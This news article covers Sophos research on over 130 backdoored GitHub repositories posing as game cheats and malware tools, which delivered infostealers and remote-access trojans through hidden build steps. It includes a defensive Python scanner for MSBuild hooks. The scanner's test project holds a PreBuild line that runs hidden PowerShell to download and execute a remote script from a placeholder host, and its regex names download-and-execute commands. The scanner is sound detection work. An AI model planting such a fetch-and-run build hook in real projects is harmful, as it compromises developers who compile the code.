A massive cybercrime operation has been uncovered by cybersecurity researchers, revealing a sophisticated scheme that used malicious code to target unsuspecting individuals, including gamers and novice hackers. The operation involved over 130 backdoored repositories on GitHub, disguised as malware tools or game cheats.

The investigation began when a Sophos customer queried the safety of a GitHub-hosted project called Sakura RAT. While the tool itself appeared broken, researchers found it contained a hidden backdoor, targeted not at businesses but at fellow cybercriminals and novice hackers. The code included a "PreBuild" event, which silently downloaded additional malware during compilation.
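As an added illustration (not code from the Sophos research or the repositories it describes), here is a small Python scanner a defender could run over MSBuild project files before compiling an untrusted project, to surface build-time hooks such as the PreBuild event described above; the suspicious-command patterns and the sample project file are constructed assumptions.

```python
# Added example: list PreBuild/PostBuild/Exec steps in an MSBuild project
# (.csproj/.vcxproj) and flag those that fetch or run remote content.
import re
import xml.etree.ElementTree as ET

# Assumed indicators of a build step reaching out to the network or
# decoding a hidden payload; tune this list for your own environment.
SUSPICIOUS = re.compile(
    r"(Invoke-WebRequest|iwr\b|Invoke-Expression|iex\b|DownloadString|"
    r"DownloadFile|curl\b|wget\b|bitsadmin|certutil\b.*-urlcache|"
    r"https?://|-EncodedCommand|-enc\b|FromBase64String)",
    re.IGNORECASE,
)

# Elements whose contents MSBuild executes as a shell command during a build.
EXEC_TAGS = {"PreBuildEvent", "PostBuildEvent", "Exec"}

def find_build_hooks(project_xml: str) -> list:
    """Return every build-time command in the project, marked suspicious or not."""
    root = ET.fromstring(project_xml)
    hits = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]  # drop the MSBuild XML namespace if present
        if tag not in EXEC_TAGS:
            continue
        # <Exec Command="..."/> keeps its command in an attribute;
        # <PreBuildEvent>...</PreBuildEvent> keeps it as element text.
        cmd = elem.get("Command") if tag == "Exec" else elem.text
        cmd = (cmd or "").strip()
        if not cmd:
            continue
        hits.append({"tag": tag, "command": cmd,
                     "suspicious": bool(SUSPICIOUS.search(cmd))})
    return hits

# Constructed sample: a PreBuild step that pulls and runs a remote script,
# next to two harmless build steps.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -c "iwr http://example.invalid/stage2.ps1 | iex"</PreBuildEvent>
    <PostBuildEvent>copy $(TargetPath) $(SolutionDir)\\bin\\</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Pre" BeforeTargets="Build">
    <Exec Command="echo building" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for h in find_build_hooks(SAMPLE_CSPROJ):
        print(f"[{'SUSPICIOUS' if h['suspicious'] else 'ok'}] {h['tag']}: {h['command']}")
```

The same check can be pointed at a cloned repository by reading each project file from disk and passing its contents to `find_build_hooks`.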

This was just one clue in what became a deep investigation into weaponized repositories. Sophos analysts traced the email address embedded in the malware, uncovering 141 repositories, 133 of which were backdoored and impersonated legitimate projects. The threat actor used automation to maintain the illusion of active development, filling the repositories with thousands of auto-generated commits produced by GitHub Actions workflows.

Most repository owners had only a few other projects, and contributor accounts followed strict patterns, suggesting a coordinated structure. Malware was often hosted in GitHub releases or on paste sites, with infection chains hidden in layers of obfuscated code across several formats, including PowerShell, Python, JavaScript, and Windows screensavers.

While the final payloads varied, they often delivered known threats like Lumma Stealer or AsyncRAT. Researchers believe many of these projects were seeded across forums and social platforms to lure unsuspecting users into compiling and running the backdoored tools.

Sophos suggests that this operation may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024. Some code artifacts and infrastructure overlap with past campaigns, but whether the same actor is responsible remains unclear.

To combat this threat, Sophos has reported all known active repositories and paste sites to the relevant platforms. Most have since been taken down. "Ironically, the threat actor seems to predominantly target cheating gamers and inexperienced cybercriminals," said the research team. "It's also worth noting that malware doesn't usually care who it ends up infecting, and so other groups may also have been infected – including people experimenting with open-source repositories out of curiosity."

The incident highlights the need for vigilance among developers and users of open-source projects, particularly on platforms like GitHub. It also underscores the importance of cybersecurity awareness and education in preventing these types of threats.

Key Takeaways:

* Over 130 backdoored repositories were discovered on GitHub, disguised as malware tools or game cheats.
* The operation targeted unsuspecting individuals, including gamers and novice hackers.
* Sophos reports that most known active repositories and paste sites have been taken down.
* The incident may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024.
* Cybersecurity awareness and education are essential in preventing these types of threats.